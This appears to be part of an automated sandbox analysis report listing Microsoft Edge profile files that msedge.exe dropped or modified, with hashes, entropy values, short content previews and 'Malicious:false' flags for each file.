                                                                                                                                                                                                                                                                                                        Preview:{"edge_fundamentals_appdefaults":{"ess_lightweight_version":101},"ess_kv_states":{"restore_on_startup":{"closed_notification":false,"decrypt_success":true,"key":"restore_on_startup","notification_popup_count":0},"startup_urls":{"closed_notification":false,"decrypt_success":true,"key":"startup_urls","notification_popup_count":0},"template_url_data":{"closed_notification":false,"decrypt_success":true,"key":"template_url_data","notification_popup_count":0}},"extensions":{"settings":{"ahfgeienlihckogmohjhadlkjgocpleb":{"active_permissions":{"api":["management","system.display","system.storage","webstorePrivate","system.cpu","system.memory","system.network"],"explicit_host":[],"manifest_permissions":[],"scriptable_host":[]},"app_launcher_ordinal":"t","commands":{},"content_settings":[],"creation_flags":1,"events":[],"first_install_time":"13379003729291748","from_webstore":false,"incognito_content_settings":[],"incognito_preferences":{},"last_update_time":"13379003729291748","location":5,"ma
                                                                                                                                                                                                                                                                                                        Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                                        File Type:JSON data
                                                                                                                                                                                                                                                                                                        Category:dropped
                                                                                                                                                                                                                                                                                                        Size (bytes):24723
                                                                                                                                                                                                                                                                                                        Entropy (8bit):5.56861186921997
                                                                                                                                                                                                                                                                                                        Encrypted:false
                                                                                                                                                                                                                                                                                                        SSDEEP:768:220BhCWPfCfxD8F1+UoAYDCx9Tuqh0VfUC9xbog/OVA5bcOrwnupItu9R:220BhCWPfCfxDu1jaVFcLnZtc
                                                                                                                                                                                                                                                                                                        MD5:90F193A17F0C6D72CA8803CD03779C8A
                                                                                                                                                                                                                                                                                                        SHA1:98EAC7B99EEBA7CCE56B32AA8724AEE9AF35ED67
                                                                                                                                                                                                                                                                                                        SHA-256:3CD64657BC0012905D1164142F4B46FB98F4EF22D8F59E2278CF53D67CBDA0BB
                                                                                                                                                                                                                                                                                                        SHA-512:98406CD0C774802E1B3D162A0A48E3CA024ABF766F4EC7F68163B6FCF108BE5D20F51FA6495A7E4E885ED9B315F448FDCDF65BAD0EC2BB6A4522ED8B75A04FBB
                                                                                                                                                                                                                                                                                                        Malicious:false
                                                                                                                                                                                                                                                                                                        Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                                        File Type:JSON data
                                                                                                                                                                                                                                                                                                        Category:dropped
                                                                                                                                                                                                                                                                                                        Size (bytes):10240
                                                                                                                                                                                                                                                                                                        Entropy (8bit):5.110271059977855
                                                                                                                                                                                                                                                                                                        Encrypted:false
                                                                                                                                                                                                                                                                                                        SSDEEP:192:stqk6n/stQcV3jwmw5Bkz3o88bV+FCHQAr42aPcKJ:stqvstQcV3je/bGOQC42U
                                                                                                                                                                                                                                                                                                        MD5:B5F93B1DB910276D6879AFE62A933CEF
                                                                                                                                                                                                                                                                                                        SHA1:7BEB35F99B4167E5CAEBE5B01F1D25B395DBE408
                                                                                                                                                                                                                                                                                                        SHA-256:3EC6DF3C4A75B10E052FA934D81ACF8D7844919754B2AEC5AF74A56C492F915C
                                                                                                                                                                                                                                                                                                        SHA-512:DD403535A48C76A92F0A706F4AE16458D204F0C939C3181564117BAB08E2310F77377178552ABC14ADC82BFBB191B4FD663678D91EA28823A0CA0F1385F6DA92
                                                                                                                                                                                                                                                                                                        Malicious:false
                                                                                                                                                                                                                                                                                                        Preview:{"aadc_info":{"age_group":0},"account_tracker_service_last_update":"13379003729910665","alternate_error_pages":{"backup":true},"apps":{"shortcuts_arch":"","shortcuts_version":0},"arbitration_experiences":{},"arbitration_local_nsat_reset_time":"13340977503326359","arbitration_using_experiment_config":false,"autocomplete":{"retention_policy_last_version":117},"browser":{"available_dark_theme_options":"All","has_seen_welcome_page":false,"should_reset_check_default_browser":false,"time_of_last_normal_window_close":"13379003731335043","toolbar_extensions_hub_button_visibility":0,"underside_chat_bing_signed_in_status":false,"window_placement":{"bottom":974,"left":10,"maximized":true,"right":1060,"top":10,"work_area_bottom":984,"work_area_left":0,"work_area_right":1280,"work_area_top":0}},"browser_content_container_height":914,"browser_content_container_width":1236,"browser_content_container_x":0,"browser_content_container_y":70,"continuous_migration":{"ci_correction_for_holdout_treatment_sta
                                                                                                                                                                                                                                                                                                        Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                                        File Type:JSON data
                                                                                                                                                                                                                                                                                                        Category:dropped
                                                                                                                                                                                                                                                                                                        Size (bytes):30079
                                                                                                                                                                                                                                                                                                        Entropy (8bit):5.568240900763996
                                                                                                                                                                                                                                                                                                        Encrypted:false
                                                                                                                                                                                                                                                                                                        SSDEEP:768:220B7V7pLGLhnCWPfCfxD8F1+UoAYDCx9Tuqh0VfUC9xbog/OVAin5bcOrwnZpIC:220B7jchnCWPfCfxDu1jaVinFcLnYt0
                                                                                                                                                                                                                                                                                                        MD5:66750B2294B1911B7D250EC77C3F11DE
                                                                                                                                                                                                                                                                                                        SHA1:B61B1897A216AC32ED8842AA1B8FC8E3AE7F6315
                                                                                                                                                                                                                                                                                                        SHA-256:2252058CFA017AEEDB4D4A9C4BCECFCBC15F87C02F3C723FF8441FF84BD63658
                                                                                                                                                                                                                                                                                                        SHA-512:AB0616EE552C19BA75B1D49D08FCABD2A1D79B58081F8A68E293D6906F98F5461EC38595105D30969ED06C6048E516806C62F52D5FF57DB6325B06355DFEF505
                                                                                                                                                                                                                                                                                                        Malicious:false
                                                                                                                                                                                                                                                                                                        Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                                        File Type:very short file (no magic)
                                                                                                                                                                                                                                                                                                        Category:dropped
                                                                                                                                                                                                                                                                                                        Size (bytes):1
                                                                                                                                                                                                                                                                                                        Entropy (8bit):0.0
                                                                                                                                                                                                                                                                                                        Encrypted:false
                                                                                                                                                                                                                                                                                                        SSDEEP:3:L:L
                                                                                                                                                                                                                                                                                                        MD5:5058F1AF8388633F609CADB75A75DC9D
                                                                                                                                                                                                                                                                                                        SHA1:3A52CE780950D4D969792A2559CD519D7EE8C727
                                                                                                                                                                                                                                                                                                        SHA-256:CDB4EE2AEA69CC6A83331BBE96DC2CAA9A299D21329EFB0336FC02A82E1839A8
                                                                                                                                                                                                                                                                                                        SHA-512:0B61241D7C17BCBB1BAEE7094D14B7C451EFECC7FFCBD92598A0F13D313CC9EBC2A07E61F007BAF58FBF94FF9A8695BDD5CAE7CE03BBF1E94E93613A00F25F21
                                                                                                                                                                                                                                                                                                        Malicious:false
                                                                                                                                                                                                                                                                                                        Preview:.
                                                                                                                                                                                                                                                                                                        Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                                        File Type:JSON data
                                                                                                                                                                                                                                                                                                        Category:dropped
                                                                                                                                                                                                                                                                                                        Size (bytes):10074
                                                                                                                                                                                                                                                                                                        Entropy (8bit):5.111812263541838
                                                                                                                                                                                                                                                                                                        Encrypted:false
                                                                                                                                                                                                                                                                                                        SSDEEP:192:stqk6n/stQcV3jwmw5Bkz3o88bV+FCHQArGBaPcKJ:stqvstQcV3je/bGOQCEU
                                                                                                                                                                                                                                                                                                        MD5:56C6F23A2B38F5C0CDE8623CDDDEB2DE
                                                                                                                                                                                                                                                                                                        SHA1:06BC05EF8FE39106817FC34BE254A4067C3D492E
                                                                                                                                                                                                                                                                                                        SHA-256:BD707F70BCB2B7E13BB191F46CCE7314A3A0D4C123AC734C7919F9BC1259C854
                                                                                                                                                                                                                                                                                                        SHA-512:5E3AEEBA4E6BAEAA67D8B6073EEA16866EEC69C6669685883002BBFE5FA3681C6892C865C420EBF98713CCB202B54C176BF4FC319D5570E72906E0B26F98F052
                                                                                                                                                                                                                                                                                                        Malicious:false
                                                                                                                                                                                                                                                                                                        Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                                        File Type:ASCII text
                                                                                                                                                                                                                                                                                                        Category:dropped
                                                                                                                                                                                                                                                                                                        Size (bytes):16
                                                                                                                                                                                                                                                                                                        Entropy (8bit):3.2743974703476995
                                                                                                                                                                                                                                                                                                        Encrypted:false
                                                                                                                                                                                                                                                                                                        SSDEEP:3:1sjgWIV//Uv:1qIFUv
                                                                                                                                                                                                                                                                                                        MD5:46295CAC801E5D4857D09837238A6394
                                                                                                                                                                                                                                                                                                        SHA1:44E0FA1B517DBF802B18FAF0785EEEA6AC51594B
                                                                                                                                                                                                                                                                                                        SHA-256:0F1BAD70C7BD1E0A69562853EC529355462FCD0423263A3D39D6D0D70B780443
                                                                                                                                                                                                                                                                                                        SHA-512:8969402593F927350E2CEB4B5BC2A277F3754697C1961E3D6237DA322257FBAB42909E1A742E22223447F3A4805F8D8EF525432A7C3515A549E984D3EFF72B23
                                                                                                                                                                                                                                                                                                        Malicious:false
                                                                                                                                                                                                                                                                                                        Preview:MANIFEST-000001.
                                                                                                                                                                                                                                                                                                        Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                                        File Type:data
                                                                                                                                                                                                                                                                                                        Category:modified
                                                                                                                                                                                                                                                                                                        Size (bytes):33
                                                                                                                                                                                                                                                                                                        Entropy (8bit):3.5394429593752084
                                                                                                                                                                                                                                                                                                        Encrypted:false
                                                                                                                                                                                                                                                                                                        SSDEEP:3:iWstvhYNrkUn:iptAd
                                                                                                                                                                                                                                                                                                        MD5:F27314DD366903BBC6141EAE524B0FDE
                                                                                                                                                                                                                                                                                                        SHA1:4714D4A11C53CF4258C3A0246B98E5F5A01FBC12
                                                                                                                                                                                                                                                                                                        SHA-256:68C7AD234755B9EDB06832A084D092660970C89A7305E0C47D327B6AC50DD898
                                                                                                                                                                                                                                                                                                        SHA-512:07A0D529D9458DE5E46385F2A9D77E0987567BA908B53DDB1F83D40D99A72E6B2E3586B9F79C2264A83422C4E7FC6559CAC029A6F969F793F7407212BB3ECD51
                                                                                                                                                                                                                                                                                                        Malicious:false
                                                                                                                                                                                                                                                                                                        Preview:...m.................DB_VERSION.1
                                                                                                                                                                                                                                                                                                        Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                                        File Type:ASCII text
                                                                                                                                                                                                                                                                                                        Category:dropped
                                                                                                                                                                                                                                                                                                        Size (bytes):16
                                                                                                                                                                                                                                                                                                        Entropy (8bit):3.2743974703476995
                                                                                                                                                                                                                                                                                                        Encrypted:false
                                                                                                                                                                                                                                                                                                        SSDEEP:3:1sjgWIV//Uv:1qIFUv
                                                                                                                                                                                                                                                                                                        MD5:46295CAC801E5D4857D09837238A6394
                                                                                                                                                                                                                                                                                                        SHA1:44E0FA1B517DBF802B18FAF0785EEEA6AC51594B
                                                                                                                                                                                                                                                                                                        SHA-256:0F1BAD70C7BD1E0A69562853EC529355462FCD0423263A3D39D6D0D70B780443
                                                                                                                                                                                                                                                                                                        SHA-512:8969402593F927350E2CEB4B5BC2A277F3754697C1961E3D6237DA322257FBAB42909E1A742E22223447F3A4805F8D8EF525432A7C3515A549E984D3EFF72B23
                                                                                                                                                                                                                                                                                                        Malicious:false
                                                                                                                                                                                                                                                                                                        Preview:MANIFEST-000001.
                                                                                                                                                                                                                                                                                                        Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                                        File Type:ASCII text
                                                                                                                                                                                                                                                                                                        Category:dropped
                                                                                                                                                                                                                                                                                                        Size (bytes):307
                                                                                                                                                                                                                                                                                                        Entropy (8bit):5.2382684186024875
                                                                                                                                                                                                                                                                                                        Encrypted:false
                                                                                                                                                                                                                                                                                                        SSDEEP:6:7RQW94SM1sZ23oH+Tcwtp3hBtB2KLlpRQWij0lyq2PsZ23oH+Tcwtp3hBWsIFUv:72WGSrcYebp3dFLT2Wij0lyvkcYebp33
                                                                                                                                                                                                                                                                                                        MD5:5C8A58673DDBEE40AEEE31EF97AA7025
                                                                                                                                                                                                                                                                                                        SHA1:6B6156F1C881E8EC35FA01C9EBE96881EBAC4E92
                                                                                                                                                                                                                                                                                                        SHA-256:3DDFC1CC453E54DC5EB789B63924A3ED256B42AD2F626DEE7001BEAEF6B4850A
                                                                                                                                                                                                                                                                                                        SHA-512:9DF1CA34BE8541794F18445B71632332E5B8CF7A6A731EFD3E2BDA810F6FBAB3260C5128907CA2E2B09A8134A70443DB9921E46B75BAA6DA29496C71E7899FA3
                                                                                                                                                                                                                                                                                                        Malicious:false
                                                                                                                                                                                                                                                                                                        Preview:2024/12/18-08:55:32.730 1ec4 Creating DB C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\AdPlatform/auto_show_data.db since it was missing..2024/12/18-08:55:32.744 1ec4 Reusing MANIFEST C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\AdPlatform/auto_show_data.db/MANIFEST-000001.
                                                                                                                                                                                                                                                                                                        Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                                        File Type:OpenPGP Secret Key
                                                                                                                                                                                                                                                                                                        Category:dropped
                                                                                                                                                                                                                                                                                                        Size (bytes):41
                                                                                                                                                                                                                                                                                                        Entropy (8bit):4.704993772857998
                                                                                                                                                                                                                                                                                                        Encrypted:false
                                                                                                                                                                                                                                                                                                        SSDEEP:3:scoBAIxQRDKIVjn:scoBY7jn
                                                                                                                                                                                                                                                                                                        MD5:5AF87DFD673BA2115E2FCF5CFDB727AB
                                                                                                                                                                                                                                                                                                        SHA1:D5B5BBF396DC291274584EF71F444F420B6056F1
                                                                                                                                                                                                                                                                                                        SHA-256:F9D31B278E215EB0D0E9CD709EDFA037E828F36214AB7906F612160FEAD4B2B4
                                                                                                                                                                                                                                                                                                        SHA-512:DE34583A7DBAFE4DD0DC0601E8F6906B9BC6A00C56C9323561204F77ABBC0DC9007C480FFE4092FF2F194D54616CAF50AECBD4A1E9583CAE0C76AD6DD7C2375B
                                                                                                                                                                                                                                                                                                        Malicious:false
                                                                                                                                                                                                                                                                                                        Preview:.|.."....leveldb.BytewiseComparator......
                                                                                                                                                                                                                                                                                                        Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                                        File Type:data
                                                                                                                                                                                                                                                                                                        Category:modified
                                                                                                                                                                                                                                                                                                        Size (bytes):12889
                                                                                                                                                                                                                                                                                                        Entropy (8bit):5.3790883644906335
                                                                                                                                                                                                                                                                                                        Encrypted:false
                                                                                                                                                                                                                                                                                                        SSDEEP:192:jVeA7NzzQdTCu960h80CZrOCVyQbrrPI3lqLmCcWXAS:jMA7Z+60h80CZayrPI3lqSCcWQS
                                                                                                                                                                                                                                                                                                        MD5:85D87580AB59A019C5DCBB708E89CDEA
                                                                                                                                                                                                                                                                                                        SHA1:5B9FEFBB468C158893E07DBA901FC17AC7CCC06B
                                                                                                                                                                                                                                                                                                        SHA-256:63FA4FA370DCBC4AF61F91C413EE6B6915E5031BEFF2633F2ECB16B7CF717265
                                                                                                                                                                                                                                                                                                        SHA-512:F2A330B24DF9299CEBDA8740DC495315B0704FAFD939711713E7238F81B173514E54949A523C657DAFB4729CCFCC18C512E58D1475478F111582591F683A77FC
                                                                                                                                                                                                                                                                                                        Malicious:false
                                                                                                                                                                                                                                                                                                        Preview:...m.................DB_VERSION.1.8...................QUERY_TIMESTAMP:arbitration_priority_list4.*.*.13340976957085123.$QUERY:arbitration_priority_list4.*.*..[{"name":"arbitration_priority_list","url":"https://edgeassetservice.azureedge.net/assets/arbitration_priority_list/4.0.5/asset?sv=2017-07-29&sr=c&sig=NtPyTqjbjPElpw2mWa%2FwOk1no4JFJEK8%2BwO4xQdDJO4%3D&st=2021-01-01T00%3A00%3A00Z&se=2023-12-30T00%3A00%3A00Z&sp=r&assetgroup=ArbitrationService","version":{"major":4,"minor":0,"patch":5},"hash":"N0MkrPHaUyfTgQSPaiVpHemLMcVgqoPh/xUYLZyXayg=","size":11749}]...................'ASSET_VERSION:arbitration_priority_list.4.0.5..ASSET:arbitration_priority_list.[{. "configVersion": 32,. "PrivilegedExperiences": [. "ShorelinePrivilegedExperienceID",. "SHOPPING_AUTO_SHOW_COUPONS_CHECKOUT",. "SHOPPING_AUTO_SHOW_LOWER_PRICE_FOUND",. "SHOPPING_AUTO_SHOW_BING_SEARCH",. "SHOPPING_AUTO_SHOW_REBATES",. "SHOPPING_AUTO_SHOW_REBATES_CONFIRMATION",. "SHOPPING_AUTO_SHOW_REBATES_DEACTI
                                                                                                                                                                                                                                                                                                        Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                                        File Type:ASCII text
                                                                                                                                                                                                                                                                                                        Category:dropped
                                                                                                                                                                                                                                                                                                        Size (bytes):331
                                                                                                                                                                                                                                                                                                        Entropy (8bit):5.15270814476135
                                                                                                                                                                                                                                                                                                        Encrypted:false
                                                                                                                                                                                                                                                                                                        SSDEEP:6:7RQEccOq2PsZ23oH+Tcwt9Eh1tIFUt8ORQEcVZmw+ORQEcCFkwOsZ23oH+Tcwt9O:721cOvkcYeb9Eh16FUt8O21V/+O21CF1
                                                                                                                                                                                                                                                                                                        MD5:A5CC2E44277248CA769BCDD68E8B5870
                                                                                                                                                                                                                                                                                                        SHA1:D61D21A5D10631C0010C431651B6DB241611077F
                                                                                                                                                                                                                                                                                                        SHA-256:3359CD23622E9FCB9856BADBEBEA2E3A72D3719AE37444716B9C6CE6BCDEEC13
                                                                                                                                                                                                                                                                                                        SHA-512:21EFC43BF45DD69926ED4690B05174E27BB8FC93686D7006351CFF4613BB741A567ABCFFF7F23C06F581465BB78F7803D5AABECEA3E969E6C37A7B0C49FE1A66
                                                                                                                                                                                                                                                                                                        Malicious:false
                                                                                                                                                                                                                                                                                                        Preview:2024/12/18-08:55:34.951 940 Reusing MANIFEST C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Asset Store\assets.db/MANIFEST-000001.2024/12/18-08:55:34.954 940 Recovering log #3.2024/12/18-08:55:34.957 940 Reusing old log C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Asset Store\assets.db/000003.log .
                                                                                                                                                                                                                                                                                                        Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                                        File Type:data
                                                                                                                                                                                                                                                                                                        Category:dropped
                                                                                                                                                                                                                                                                                                        Size (bytes):270336
                                                                                                                                                                                                                                                                                                        Entropy (8bit):0.0018164538716206491
                                                                                                                                                                                                                                                                                                        Encrypted:false
                                                                                                                                                                                                                                                                                                        SSDEEP:3:MsEllllkEthXllkl2zEflWV:/M/xT02zbV
                                                                                                                                                                                                                                                                                                        MD5:9F3AE56F45A6188DF26A755000191632
                                                                                                                                                                                                                                                                                                        SHA1:B2E74B1674D6FBEF33001674CF80F288DFBBB4E3
                                                                                                                                                                                                                                                                                                        SHA-256:FFC4CD9922271B01F40116C6F94A7F989FF41BA478E85A4495996148D128B6AA
                                                                                                                                                                                                                                                                                                        SHA-512:75C984797642540D0838AF25D587246D86525045F749004BDF999C5A20997210033A2F2E3ADCAADC03760D3B0452FEABD770A2F31FB06B0245B5D54BBEBAEB3B
                                                                                                                                                                                                                                                                                                        Malicious:false
                                                                                                                                                                                                                                                                                                        Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                                        File Type:ASCII text
                                                                                                                                                                                                                                                                                                        Category:dropped
                                                                                                                                                                                                                                                                                                        Size (bytes):346
                                                                                                                                                                                                                                                                                                        Entropy (8bit):5.230831017946792
                                                                                                                                                                                                                                                                                                        Encrypted:false
                                                                                                                                                                                                                                                                                                        SSDEEP:6:7RQ1Oq2PsZ23oH+TcwtnG2tMsIFUt8ORQMSVZmw+ORQMSSF/FkwOsZ23oH+TcwtB:721OvkcYebn9GFUt8O2MSV/+O2MS2F5+
                                                                                                                                                                                                                                                                                                        MD5:3CAA438567505AAE23771602612A813C
                                                                                                                                                                                                                                                                                                        SHA1:7C2C98381168F59B9732F5855F07AE8E6D4ED6ED
                                                                                                                                                                                                                                                                                                        SHA-256:A0D4FD1323361D7F4DEF47F72935D8C801D730FA6D3183E2D5C4250ACABB0581
                                                                                                                                                                                                                                                                                                        SHA-512:2D421FDC90EE9D86AE9B58830844A23BE962A1865D7C9725DB92031F31799DA8339AC54D27D4772FC87AA0D36A491ED50F8ACA15A2DC502B14AA329A7A74D7FC
                                                                                                                                                                                                                                                                                                        Malicious:false
                                                                                                                                                                                                                                                                                                        Preview:2024/12/18-08:55:33.277 1da4 Reusing MANIFEST C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\EdgeCoupons/coupons_data.db/MANIFEST-000001.2024/12/18-08:55:33.376 1da4 Recovering log #3.2024/12/18-08:55:33.377 1da4 Reusing old log C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\EdgeCoupons/coupons_data.db/000003.log .
                                                                                                                                                                                                                                                                                                        Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                                        File Type:data
                                                                                                                                                                                                                                                                                                        Category:dropped
                                                                                                                                                                                                                                                                                                        Size (bytes):418
                                                                                                                                                                                                                                                                                                        Entropy (8bit):1.8784775129881184
                                                                                                                                                                                                                                                                                                        Encrypted:false
                                                                                                                                                                                                                                                                                                        SSDEEP:6:qTCTCTCTCTCTCTCTCTCTCTCTCTCTCTCTCTCTCTCTCTCT:qWWWWWWWWWWWWWWWWWWWWW
                                                                                                                                                                                                                                                                                                        MD5:BF097D724FDF1FCA9CF3532E86B54696
                                                                                                                                                                                                                                                                                                        SHA1:4039A5DD607F9FB14018185F707944FE7BA25EF7
                                                                                                                                                                                                                                                                                                        SHA-256:1B8B50A996172C16E93AC48BCB94A3592BEED51D3EF03F87585A1A5E6EC37F6B
                                                                                                                                                                                                                                                                                                        SHA-512:31857C157E5B02BCA225B189843CE912A792A7098CEA580B387977B29E90A33C476DF99AD9F45AD5EB8DA1EFFD8AC3A78870988F60A32D05FA2DA8F47794FACE
                                                                                                                                                                                                                                                                                                        Malicious:false
                                                                                                                                                                                                                                                                                                        Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                                        File Type:ASCII text
                                                                                                                                                                                                                                                                                                        Category:dropped
                                                                                                                                                                                                                                                                                                        Size (bytes):322
                                                                                                                                                                                                                                                                                                        Entropy (8bit):5.16698160033669
                                                                                                                                                                                                                                                                                                        Encrypted:false
                                                                                                                                                                                                                                                                                                        SSDEEP:6:7RQFXgUAsq2PsZ23oH+Tcwt8aPrqIFUt8ORQFXqyZmw+ORQFXq+kwOsZ23oH+TcD:72eUAsvkcYebL3FUt8O2z/+O2p51cYeo
                                                                                                                                                                                                                                                                                                        MD5:70E24C0AD3793CFE57DFCA092D2045A1
                                                                                                                                                                                                                                                                                                        SHA1:294E4A293CD1EEC5F59C7FCF1E3F9773347713E0
                                                                                                                                                                                                                                                                                                        SHA-256:E4CBC84FCF424D5CD565BA9FBB1BA41D7535C71AD7608B3E9FFEC2B37C10B447
                                                                                                                                                                                                                                                                                                        SHA-512:66AE66719436C9C3907523142DB2F7504B3125AAF34137262B8EF3877395D2489A2FED87B4AC41FFA49F4769D427AF8264DB0CDE3302BC0027455BBAA01BF80B
                                                                                                                                                                                                                                                                                                        Malicious:false
                                                                                                                                                                                                                                                                                                        Preview:2024/12/18-08:55:42.225 1eb4 Reusing MANIFEST C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Extension Rules/MANIFEST-000001.2024/12/18-08:55:42.226 1eb4 Recovering log #3.2024/12/18-08:55:42.226 1eb4 Reusing old log C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Extension Rules/000003.log .
                                                                                                                                                                                                                                                                                                        Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                                        File Type:data
                                                                                                                                                                                                                                                                                                        Category:dropped
                                                                                                                                                                                                                                                                                                        Size (bytes):418
                                                                                                                                                                                                                                                                                                        Entropy (8bit):1.8784775129881184
                                                                                                                                                                                                                                                                                                        Encrypted:false
                                                                                                                                                                                                                                                                                                        SSDEEP:6:qTCTCTCTCTCTCTCTCTCTCTCTCTCTCTCTCTCTCTCTCTCT:qWWWWWWWWWWWWWWWWWWWWW
                                                                                                                                                                                                                                                                                                        MD5:BF097D724FDF1FCA9CF3532E86B54696
                                                                                                                                                                                                                                                                                                        SHA1:4039A5DD607F9FB14018185F707944FE7BA25EF7
                                                                                                                                                                                                                                                                                                        SHA-256:1B8B50A996172C16E93AC48BCB94A3592BEED51D3EF03F87585A1A5E6EC37F6B
                                                                                                                                                                                                                                                                                                        SHA-512:31857C157E5B02BCA225B189843CE912A792A7098CEA580B387977B29E90A33C476DF99AD9F45AD5EB8DA1EFFD8AC3A78870988F60A32D05FA2DA8F47794FACE
                                                                                                                                                                                                                                                                                                        Malicious:false
                                                                                                                                                                                                                                                                                                        Preview:.f.5................f.5................f.5................f.5................f.5................f.5................f.5................f.5................f.5................f.5................f.5................f.5................f.5................f.5................f.5................f.5................f.5................f.5................f.5................f.5................f.5................f.5...............
                                                                                                                                                                                                                                                                                                        Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                                        File Type:ASCII text
                                                                                                                                                                                                                                                                                                        Category:dropped
                                                                                                                                                                                                                                                                                                        Size (bytes):326
                                                                                                                                                                                                                                                                                                        Entropy (8bit):5.173905674397623
                                                                                                                                                                                                                                                                                                        Encrypted:false
                                                                                                                                                                                                                                                                                                        SSDEEP:6:7RQFXpRFIq2PsZ23oH+Tcwt865IFUt8ORQFXE59Zmw+ORQFXE5PkwOsZ23oH+Tc4:720vkcYeb/WFUt8O2SP/+O2Sd51cYebD
                                                                                                                                                                                                                                                                                                        MD5:60F2974C78B2A00AB998802278399ACD
                                                                                                                                                                                                                                                                                                        SHA1:A6857697B5DE84135A4B0B1E189602EF00F7BAD7
                                                                                                                                                                                                                                                                                                        SHA-256:DD7360637B8D6F0F45AF0ADD8C925D3A935A12EDD56A5CBF51A3FE3F3C23BCAE
                                                                                                                                                                                                                                                                                                        SHA-512:406C9703A6A60733F61440A8BF386DCAC404EF9AE6DF396EA5004395D00F3130A7496674A3805513CB15C3AB6DB273A5219D5A6BFB60A81B13B855E5E6154FAE
                                                                                                                                                                                                                                                                                                        Malicious:false
                                                                                                                                                                                                                                                                                                        Preview:2024/12/18-08:55:42.228 1eb4 Reusing MANIFEST C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Extension Scripts/MANIFEST-000001.2024/12/18-08:55:42.229 1eb4 Recovering log #3.2024/12/18-08:55:42.229 1eb4 Reusing old log C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Extension Scripts/000003.log .
                                                                                                                                                                                                                                                                                                        Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                                        File Type:data
                                                                                                                                                                                                                                                                                                        Category:dropped
                                                                                                                                                                                                                                                                                                        Size (bytes):1254
                                                                                                                                                                                                                                                                                                        Entropy (8bit):1.8784775129881184
                                                                                                                                                                                                                                                                                                        Encrypted:false
                                                                                                                                                                                                                                                                                                        SSDEEP:12:qWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWA:
                                                                                                                                                                                                                                                                                                        MD5:826B4C0003ABB7604485322423C5212A
                                                                                                                                                                                                                                                                                                        SHA1:6B8EF07391CD0301C58BB06E8DEDCA502D59BCB4
                                                                                                                                                                                                                                                                                                        SHA-256:C56783C3A6F28D9F7043D2FB31B8A956369F25E6CE6441EB7C03480334341A63
                                                                                                                                                                                                                                                                                                        SHA-512:0474165157921EA84062102743EE5A6AFE500F1F87DE2E87DBFE36C32CFE2636A0AE43D8946342740A843D5C2502EA4932623C609B930FE8511FE7356D4BAA9C
                                                                                                                                                                                                                                                                                                        Malicious:false
                                                                                                                                                                                                                                                                                                        Preview:.f.5................f.5................f.5................f.5................f.5................f.5................f.5................f.5................f.5................f.5................f.5................f.5................f.5................f.5................f.5................f.5................f.5................f.5................f.5................f.5................f.5................f.5................f.5................f.5................f.5................f.5................f.5................f.5................f.5................f.5................f.5................f.5................f.5................f.5................f.5................f.5................f.5................f.5................f.5................f.5................f.5................f.5................f.5................f.5................f.5................f.5................f.5................f.5................f.5................f.5................f.5................f.5................f.5........
                                                                                                                                                                                                                                                                                                        Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                                        File Type:ASCII text
                                                                                                                                                                                                                                                                                                        Category:dropped
                                                                                                                                                                                                                                                                                                        Size (bytes):322
                                                                                                                                                                                                                                                                                                        Entropy (8bit):5.171260232613203
                                                                                                                                                                                                                                                                                                        Encrypted:false
                                                                                                                                                                                                                                                                                                        SSDEEP:6:7RQMccUq2PsZ23oH+Tcwt8NIFUt8ORQqi9Zmw+ORQqiPkwOsZ23oH+Tcwt8+eLJ:72MGvkcYebpFUt8O2D9/+O2DP51cYeb2
                                                                                                                                                                                                                                                                                                        MD5:FD3259F0271589A1A530C5EF154F43BB
                                                                                                                                                                                                                                                                                                        SHA1:151C9BF4F945A5EBA7F218533F52C4ACD67E7C26
                                                                                                                                                                                                                                                                                                        SHA-256:B6551CAFE7616E70B3E2ABBBE89607A6A3F327065AF1F060B0B3B3A8CA5A39FC
                                                                                                                                                                                                                                                                                                        SHA-512:EB45F5F09F31B6B3CE8EDE3A576870196E42121343855541E64BC0AA9712AD717B005D62F0423554E5F8D49F452F3BEDE2341E9A921A28B4A841066C7A9EFA42
                                                                                                                                                                                                                                                                                                        Malicious:false
